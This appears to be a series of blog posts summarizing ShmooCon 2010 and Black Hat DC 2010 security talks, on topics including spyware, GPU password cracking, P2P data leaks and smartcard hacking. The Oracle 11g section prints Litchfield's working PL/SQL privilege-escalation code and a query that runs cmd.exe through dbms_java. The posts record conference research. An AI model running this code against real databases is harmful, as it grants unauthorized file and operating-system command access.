This three day event located at the Wardman Park Marriott, Washington DC, USA, was packed full of intense, fast tracked presentations demonstrating technology vulnerabilities and exploitation, software and hardware solutions, and open discussions of critical information security issues.

ShmooCon 2010 Contests and More

The Hacker Arcade, ShmooCon’s, “high-tech version of Chuck-E-Cheese,” was in its fifth year. With prizes for gamers and contest entrants, competitors arrived at ShmooCon with a host of innovative games they had developed to enter into the competition and to share with other gamers. Regarding Hack-or-Halo, ShmooCon wrote, “For those not in the know, Hack-or-Halo is a ShmooCon exclusive, the very best hacking-plus-gaming competition in the world.” The TF2 Lan Party featured a TF2 Tourney revolving around Team Fortress 2 (TF2 Official Blog), plus a team oriented Cheater Tourney to see who writes the best gaming cheat code.

Blackberry Mobile Spyware

In his presentation, “Blackberry Mobile Spyware – The Monkey Steals the Berries,” Tyler Shields focused on spyware used as a tool to steal personal and private data from computers and mobile devices like the Blackberry Mobile and others. Shields explained how the spyware is typically installed on unsuspecting users’ computers and mobile phones where it can monitor, capture, log, and depart with data targeted by an attacker.

Shields introduced “TXSBBSpy,” spyware source code used by security researchers to assist the development of security mechanisms. See the links below for the full source code, video of a proof-of-concept BlackBerry spyware package developed by Tyler Shields, and the slides shown at ShmooCon.

• Slides: Blackberry Mobile Spyware (PDF).
• TXSBBSpy Demo by Tyler Shields at Veracode Research Lab.
• Source: txsBBSpy.java download.

The Friendly Traitor: Our Software Wants to Kill Us

During this presentation, Kevin Johnson and Mike Poor, focused on examples using features of client applications. They explained that SWF has wide-spread support, and ActionScript adds powerful feature sets that can be used for cross domain attacks.

Johnson and Poor used a simple Python “scanner script” to demonstrate an attack using these basic steps: read the Alexa Top 1 million domains list, compare the domain to the Google Safe List and discard if not listed, and retrieve and parse crossdomain.xml.

Back to the Glass House

Jim Manley, discussed advanced USB malware during his presentation, “Back to the Glass House.” The propagation of traditional USB malware is very viral: infecting every computer users access, traveling and infecting computers across geographic boundaries, and transferred by users as they access separate wireless networks.

Cracking the Foundation: Attacking WCF Web Services

Brian Holyfield made hacking WCF Web Services look easy. During his talk about HTTP/S proxies and MC-NBFS, Holyfield pointed out that there was limited support for MC-NBFS/MSBin1 in most common proxy tools. He suggested Richard Berg’s Fiddler Binary XML Inspector for reading binary XML messages.

When talking about MetaData over SSL, Holyfield reminded the audience that the default Visual Studio template does not provide for an “s” at the end of http. During the remainder of the presentation, Holyfield demonstrated leveraging MetaData for manual testing using WcfTestClient, which automatically parses WSDL or MEX. WcfTestClient ships with Visual Studio 2008+. In addition, Holyfield discussed WCF Storm, which supports most WCF bindings. See the links below for resources and downloads.

• TFS Toys Subversion
• WcfTestClient
• WCF Storm Free Lite Version

Pulling the Plug: Security Risks in the Next Generation of Offline Web Applications

Michael Sutton discussed, “Security Risks in the Next Generation of Offline Web Applications.” Two main topics of interest were Google Gears and HTML5. Sutton said that Google did not intend to compete with HTML5, however, Google did develop Google Gears as a web application. In 2007, Google dropped “Google” from the name so that Gears might attract a wider audience.

Gears has three main components: a local web server, a full relational database, and a client side database. Sutton continued with a detailed demonstration of a variety of real-world vulnerabilities that have been uncovered, including a new class of cross-site scripting and client-side SQL injection.

Better Approaches to Physical Tamper Detection

The last presentation of the day and ShmooCon 2010, was “Better Approaches to Physical Tamper Detection,” by Roger Johnston and Jon Warner. The importance of physical security is often over looked especially when it comes to fail safes for tamper protection. To some extent, this could be because physical tamper detection is easily defeated; some might say, why bother with it?

Johnston and Warner provided the audience with a better alternative referred to as the anti-evidence method. They demonstrated the method using prototype anti-evidence seals and real-time monitors. They cited the work by the Vulnerability Assessment Team (VAT) at Argonne National Laboratory. They described the VAT as a “Multidisciplinary team of physicists, engineers, social scientists, and hackers who conduct vulnerability assessments and develop novel approaches to security.”

Day Three Closing Comments

It has been another exciting day at the ShmooCon 2010 East coast hacker convention at the Wardman Park Marriott, Washington DC, USA. Be sure to check back here at InfosecEvents for our upcoming post, “ShmooCon 2010 Wrap Up.” See you then!

Today’s presentations started according to schedule with three exciting tracks: Break It!, Build It!, and Bring It On! First up, from the Build It! track we heard from Blake Hartstein as he described JavaScript decoding and intrusion detection using Jsunpack-n. Lets scroll down and take a closer look at some of today’s event highlights.

Jsunpack-network Edition Release: JavaScript Decoding and Intrusion Detection by Blake Hartstein

Blake Hartstein is part of the Rapid Response team at iDefense, a Verisign company. For those unfamiliar with Jsunpack-network, it is a tool used to decode JavaScript for security research. Jsunpack JavaScript unpacker allows analyzing of packed or obfuscated JavaScript.

As stated in Hartstein’s presentation overview, “Attackers using web exploits are always improving their attacks to make them more effective at exploiting the victim, avoiding detection, and generally making attacks difficult for researchers to understand.” Hartstein outline the improvements of the current Jsunpack-n release over last year’s 2009 introduction of jsunpack at ShmooCon. Among those improvements Hartstein cited the release of full source code, use of Jsunpack-n to actively monitor network traffic, use of customizable rules and built-in detection mechanisms for intrusion detection, PDF and SWF decoding modules, and URL tracking mechanisms.

WLCCP – Analysis of a Potentially Flawed Protocol

Enno Rey and Oliver Roeschke discussed good and bad protocol design as they described in detail the proprietary “Wireless LAN Context Control Protocol” (WLCCP). The WLCCP protocol is used in Cisco wireless access points for the management of multiple access point wireless infrastructures called Wireless Domain Services (WDS).

From their presentation overview, “The world of ‘Enterprise WLAN solutions’ is full of obscure and ‘non-standard’ elements and technologies. One prominent example is Cisco’s Structured Wireless-Aware Network (SWAN) architecture, composed of autonomous access points combined with some components for centralized management, and still deployed in a number of corporate networks.” With that introduction they proceeded to show demos and coding used to illustrate the potential shortcomings of WLCCP. The Cisco IOS command, show wlccp wnm status can be used to reflect the status of the WLCCP link between an AP snooping on the access point.

Build your own Predator UAV @ 99.95% Discount

This was one awesome presentation that left the audience with everything but a pilot’s license. Michael Weigand’s presentation, “Build your own Predator UAV @ 99.95% Discount,” showed the audience how they could own their own Predator UAV drone. Weigand, ” Curious what war driving would be like from the eyes of an eagle?” Weigand explained the current state of open source/open hardware UAV autopilots and how to use this technology to develope a complete UAV system. Weigand even provided an overview of FAA regulations aimed at keeping us under a 400 foot ceiling.

DIY Hard Drive Diagnostics: Understanding a Broken Drive

DIY Hard Drive Diagnostics: Understanding a Broken Drive, was presented by Scott Moulton. Moulton taught the audience how to troubleshoot problems common to hard disk storage devices. He explained hard drive technology in detail, covering all aspects of the hardware components, controller boards and other electronic components, and the firmware.

Using pictures and audio in his presentation, Moulton described how to determine what might be wrong with a drive; whether it is the board, the heads, media, etc. He covered a quick diagnostics approach based on a simple process of elimination. He also stressed when one should stop troubleshooting for risk of loosing the data stored on the device. Don’t forget to download your copy of “DIY Hard Drive Diagnostics,” by Scott Moulton.

Day Two Closing Comments

It has been a full and exciting day at the ShmooCon 2010 East coast hacker convention at the Wardman Park Marriott, Washington DC, USA. Be sure to check back here at InfosecEvents for the latest news as we cover tomorrow’s ShmooCon 2010 presentations.

February 2010, things to do in Washington, DC—Lets do ShmooCon, hacking in two-feet of snow. . . .

The central theme for day one was “One Track Mind,” a single track consisting of seven 30-minute speed talks. Day two and day three will each present three tracks: Break It!, Build It!, and Bring It On!

You don’t have to be there to see ShmooCon 2010. ShmooCon will be live streaming the entire event this year. See ShmooCon Live Streaming Video for video titles and links. After day one opening remarks by Bruce Potter, the ShmooCon 2010 “turbo” talks were underway.

GPU vs. CPU Supercomputing Security Shootout

GPU vs. CPU Supercomputing Security Shootout, by Collin Brack. There was no debating the facts and figures Brack showed the audience illustrating the processing power of multi-processor GPGPU (General Purpose Graphics Processing Unit) technology over the processing power of the general purpose CPU. For certain computational tasks, low cost, high performance GPU technology has found its way into the world of supercomputing and the information security industry.

After a brief mention about Nvidia’s CUDA versus competing GPU technologies from ATI and OpenCL, Brack presented GPU verus CPU benchmarks of security tools including aircrack (10x speed-up), Pyrit (8x), CUDA Multiforcer, BarsWF MD5 cracker (3x), RainbowCrack multi-GPU CUDA version, and others. Brack emphasized results obtained with Pyrit, a GPU cracker for attacking WPA/WPA2 PSK protocols.

Sometime before ShmooCon 2010, Brack had submitted code modifications to the Pyrit svn. Using Pyrit 0.2.5-svn r208 on his MacBook Pro Core 2 Duo 2 2.5Ghz computer with precomputed tables, Brack recorded the results at about 300,000 keys per second; with his code modifications in Pyrit r209, Brack achieved about 1,000,000 keys per second. With more than three times greater performance, Pyrit r209 seems like a viable alternative.

Information Disclosure via P2P Networks

Larry Pesce and Mick Douglas presented, “Information disclosure via P2P networks: Why stealing an identity via Gnutella is like clubbing baby seals.” Larry and Mick started their presentation with a few stories about arrests of persons accused of identity theft. They shared with the audience an interesting collection of files, images, and other finds that they acquired by way of their own experiments; experiments conducted to determine how hard or easy it would be to obtain information from P2P file sharing sites. Wow, what a collection: Turbo Tax returns complete with social security numbers, bank routing numbers and account numbers, identification cards and drivers licenses, passports, and some entertaining stuff from . . . Paris Hilton’s P2P file sharing network.

Larry and Mick mentioned that next generation P2P will include encrypted traffic. However, until then, think twice about what you might actually be sharing across P2P file sharing networks. Some users might think they signed up on a P2P network to share music files, yet unknowingly have left there entire hard drive open for the taking. The remainder of this presentation was primarily about The Cactus Project, which is a “tool intended to be used for all sorts of purposes on the Gnutella bases P2P network.”

Windows File Pseudonyms

In his presentations, “Windows File Pseudonyms,” Dan Crowley discussed some interesting quirks in path and filename routines found in Windows systems. Pointing out that, “One file can be referred to with many different filepaths; some are well known, and some are not,” he proceeded to show examples of what lesser known ways would be most apt to subvert security mechanisms.

As Crowley began with DOS 8.3 naming conventions, he went on to show that file type may be determined based on user input in cases where the extension is determined by what follows the last dot. Examples of equivalent file paths were provided; discarding trailing characters, paths given Windows shell: file.txt, file.txt….., file.txt/././././” file.txt/././././“>file.txt/././././. and more. DOS special device files, CON, PRN, and COM1. The possibilities were seemingly endless.

Although not practical for use against NTFS, Crowly did provide live demonstrations showing how these quirks can be used to “bypass filters and access control mechanisms, evade IDS detection, alter the way that files are handled and processed, and make brute force attacks to enumerate files easier.”

Keynote – Closing the TLS Authentication Gap

Keynote – Closing the TLS Authentication Gap, by Steve Dispensa and Marsh Ray. When discovered in late 2009, the SSL and TLS Authentication Gap vulnerability was a serious vulnerability involving how web servers use SSL and TLS. The flaw allowed an active man-in-the-middle attacker to inject arbitrary content into an encrypted data stream.

Dispensa and Ray described the TLS Authentication Gap as representing “One of the most complex security disclosure processes in recent years.” They discussed the discovery of the flaw, provided a technical overview and demonstrations, and then discussed the rationale and lessons learned in coordinating the disclosure.

Day One Closing Comments

“One Track Mind,” a single track consisting of seven 30-minute speed talks, covered an array of interesting information security topics. We look forward to the next two days’ ShmooCon 2010 presentations. That’s it for now. It looks like attendees are on their way to this evenings’ “Hack or Halo Practice.”

• Hacking Oracle 11g
  David Litchfield talked about his method of escalating Java privileges to exploit Oracle 11g databases. Some sample code from his session is shown below. VIDEO | AUDIO

DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT ‘GRANT’,USER(), ‘SYS’,’java.io.FilePermission’,’<<ALL FILES>>‘,’execute’,’ENABLED’ from dual;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

After the Java privilege escalation it is possible to run OS commands using a simple SELECT statement:

select dbms_java.runjava(’oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst’)from dual;

• Exploiting Lawful Intercept to Wiretap the Internet
  Wiretapping and access to communications are key law enforcement tools in catching criminals. If the tools used to intercept these communications are compromised, it can provide unlawful surveillance to malicious hackers. This talk centers on flaws found on such systems and methods to secure these vulnerabilities. PDF | PPT | VIDEO | AUDIO

And here are a couple to look out for as well. You might notice that they already have media links up. Those aren’t live yet but we’ll keep you updated when they are.

• Internet Explorer turns your personal computer into a public file server
  There are several attack vectors that can be used on Internet Explorer users to enable remote viewing and even modification of their files. In this presentation, Jorge Medina shows some proof of concept attacks to demonstrate how to turn someone’s computer to a public file server. PDF | PPT | VIDEO | AUDIO
• Hacking the Smartcard Chip
  Smartcards are used in a variety of ways, from enabling cellphones and storing money to logging into computers and confirming identification. Even so, it’s not foolproof and this session will walk through how to compromise a smartcard and what tools to use for this. PPT | VIDEO | AUDIO

Today, February 3, Black Hat DC 2010 opened with “An Uninvited Guest (Who Won’t Go Home).” During this presentation, Bill Blunden addressed “battle-tested” forensic tools used to analyze storage devices. Bill gave the audience a guided tour of the latest rootkit methods deployed against Windows platforms.

As mentioned yesterday, the three tracks for day two include: Application Security, Forensics and Privacy, and Metasploit. Whether you were among the lucky ones to have attended the event, or if you did not attend, we have described some of this years’ Black Hat Briefings for you in this post. As always, we welcome your comments.

Connection String Parameter Pollution (CSPP) Attacks

Chema Alonso and Jose Palazon demonstrated how users apply tools and web applications to configure a connection against a database server. More specifically, in Microsoft Internet Information Services, how to steal the user account credentials, get access to web applications impersonating the connection, and taking advantage of web server credentials to connect against internal database servers in the DMZ without credentials.

In a post by Kelly Jackson Higgins, DarkReading, Black Hat DC: Researchers Reveal Connection String ‘Pollution’ Attack, she discusses CSPP and the CSPP Scanner (Google Spanish to English translation link for download) tool Alonso and Palazon released that provides for testing to determine if database servers are vulnerable to this form of attack.

Hacking Oracle 11g

David Litchfield, NGSSoftware Ltd., presented Black Hat Briefing “Hacking Oracle 11g.” Litchfield’s penetration testing techniques revealed yet another bug in Oracle’s database code. This Oracle Hacker Gets The Last Word (Greenberg, Forbes).

As cited by Ellen Messmer, Network World, in Black Hat: Zero-day hack of Oracle 11g database revealed, “Litchfield said he thinks Oracle probably deserves a ‘B+’ for security in the current version of its database, which he characterized as an improvement over the previous version.”

Advanced Command Injection Exploitation

David D. Rude II (bannedit), Security Engineer, ACS Inc., presented “Advanced Command Injection Exploitation: cmd.exe in the ’00s.” An interesting discussion on advanced techniques used to exploit command injection bugs. “Baaedit” showed examples of code injection used by attackers to change program execution when their code is injected into computer programs.

0-Knowledge Fuzzing

In Vincenzo Iozzo’s presentation “0-Knowledge Fuzzing,” he described “fuzzing” as “a pretty common technique used both by attackers and software developers . . . knowing the protocol/format that needs to be fuzzed and having a basic understanding of how the user input is processed inside the binary.” He continued with a demonstration of how to use techniques like code coverage, data tainting, and in-memory fuzzing to build a “smart fuzzer” with no need to instrument it.

This was a great explanation of the different attack types using numbers, chars, metadata, and pure binary sequences; application fuzzing, protocol fuzzing, and file format fuzzing. Without a doubt, we found this to have been another worthwhile Black Hat Briefing.

Neurosurgery With Meterpreter

Colin Ames, Security Researcher, Attack Research LLC and David Kerb, affiliated with Attack Research, each have over ten years’ experience with penetration testing, reverse engineering, and malware analysis. They demonstrated post-exploitation memory manipulation using Metasploit’s Meterpreter to build memory exploitation tools. The information they provided showed our audience how to gather evidence from attacks to use in determining where attacks originate from and the intent behind these attacks.

Why Black Hats Always Win

In this Black Hat DC 2010 Briefing, Val Smith with Attack Research and Chris, Security Consultant and Researcher with Secure DNA, discussed “Why Black Hats Always Win.” Now, the “good guy” versus the “bad guy” always makes for a good debate. Maybe it was just the expression on their faces, but there might have been a lot of opposing opinions among onlookers during this briefing.

White hat methodologies versus black hat methodologies were the center theme. Attackers versus defenders—offensive versus defensive—We went down the entire trail from information gathering to data collection with stopovers at vulnerability assessment and exploitation. This was one of the more exciting briefings at Black Hat DC this year, and we could have gone on way past sundown without running out of Black Hat versus White Hat information security issues to discuss.

iPhone Privacy

During his presentation “iPhone Privacy,” Nicolas Seriot, Datamining R&D Engineer, University of Applied Sciences Western Switzerland, discussed iPhone privacy issues as he questioned Apple’s position regarding the iPhone’s security implementation. The talk continued with examples of how “rogue applications” access private information on devices without modifications that might prevent a breach of end-users’ privacy. In his white paper iPhone Privacy (PDF), Seriot wrote about writing spyware for the iPhone as he introduces his proof-of-concept “SpyPhone.”

InfosecEvents’ Closing Comments

Black Hat DC 2010 was an awesome information security event. As with past Black Hat events, public and private sector information security experts thrilled audiences with talks and demonstrations regarding the latest technologies used by hackers; and the information security industry’s continuing battle against these global threats to our quality of life in this information dependent world. We look forward to seeing you at the next event!

• Connection String Parameter Pollution Attacks
  Access to databases over the Internet has become easier as well as riskier over the years. In this presentation, you will find out how to spoof and steal credentials to access Microsoft Internet Information Services as well as connecting to internal databases without credentials. PDF | PPT
• Neurosurgery With Meterpreter
  Once a machine has been exploited, one of the best tools in the hacker’s toolbox is memory manipulation. This session will discuss techniques in exploiting memory via Meterpreter to siphon off passwords, hashes and other data. PDF
• Metasploit and Money
  With the recent acquisition of Metasploit by Rapid7, HD Moore gained a lot of insight as to how to commercialize an open source project, how to maintain the community around it and how it affects the core group developing that product. This talk is one you should download if you are even remotely interested in bringing open source projects to market. PDF
• Hacking the Smartcard Chip
  Smartcards are used in a variety of ways, from enabling cellphones and storing money to logging into computers and confirming identification. Even so, it’s not foolproof and this session will walk through how to compromise a smartcard and what tools to use for this. PPT

We’ll be keeping you updated with the video link once they are posted.

Organized similar to last year’s event, the Black Hat DC 2010 schedule shows the first day’s three tracks: Application Security, The Big Picture, and Hardware. The three tracks for day 2 include: Application Security, Forensics and Privacy, and Metasploit. Day 2, February 3, of Black Hat DC 2010 opens at 9 a.m. with “An Uninvited Guest (Who Won’t Go Home).” During this presentation, Bill Blunden (MCSE, MCITP: Enterprise Administrator) addresses “battle-tested” forensic tools used to analyze storage devices. At InfosecEvents we are exited to learn more about the latest rootkit methods deployed against Windows platforms.

Black Hat, produced by TechWeb, is the world’s leading information security event. Black Hat DC 2010 hosts over 500 security experts from the public and private sector as well as underground hackers from around the world. Stay informed as we report on new vulnerabilities and new tools involving Adobe, Apache, Microsoft, Google, and Twitter.

Joseph Menn – Hacking Russia

Joseph Menn, author and Financial Times correspondent, was at the event to launch his recently published book, “Fatal System Error: The Hunt for the New Crime Lords Who are Bringing Down the Internet” During his formal presentation at this years’ Black Hat convention, “Hacking Russia: Inside An Unprecedented Prosecution of Organized Cybercrime,” Joself Menn took the audience on a trail of intrigue, describing the Russian cyber-mob and La Cosa Nostra’s fight for supremacy over the global hacker underground; an underground determined to steal financial data from consumers and defense secrets from governments.

Chris Tarnovsky – Hacking the Smartcard Chip

During break everyone was still talking about Chris Tarnovsky’s briefing “Hacking the Smartcard Chip,” an in-depth hack of the Trusted Platform Module (TPM); involving a mix of hardware and software (60 percent hardware and 40 percent software). Christopher Tarnovsky runs Flylogic Engineering, LLC and specializes in analysis of security relative to semiconductors. Once identified, Flylogic offers reports explaining in detail report of how the electronic chip under study can be compromised. DarkReading.com captured the presentation on a post called Researcher Cracks Security Of Widely Used Computer Chip.

Blogposts and Tools:

• From Richard Bejtlich’s blog TaoSecurity: Black Hat Briefings Justify Supporting Retrospective Security Analysis. Richard remarks, “Having left the talks [Black Hat Briefings], I have a set of techniques for which I can now mine my logs and related data sources for evidence of past attacks.”
• Microsoft releases free SDL tools at Black Hat DC via ComputerWeekly.com. The tools are the latest public releases of elements of Microsoft’s Security Development Lifecycle (SDL) program.

Day’s Closing Comments

Today’s Black Hat DC 2010 conference was fantastic! We’re really looking forward to what’s in store at tomorrows Black Hat Briefings. Be sure to check back with us at InfosecEvents for more Black Hat reports coming soon.

• BlackHat DC 2010 – January 31-February 3 in Virginia
• SANS Appsec Summit 2010 – February 4 – 5 in San Francisco
• ShmooCon 2010 – February 5 – 7 in Washington, DC
• 17th Annual Network and Distributed System Security (NDSS) Symposium – February 28 to March 3 in San Diego

And here are the information security events in the other parts of the world:

• nullCon GOA 2010 – February 6 – 7 in India
• SANS Tokyo 2010 Spring – February 15 – 20 in Japan

Be sure to check out our ShmooCon preview for more info about this sold out event!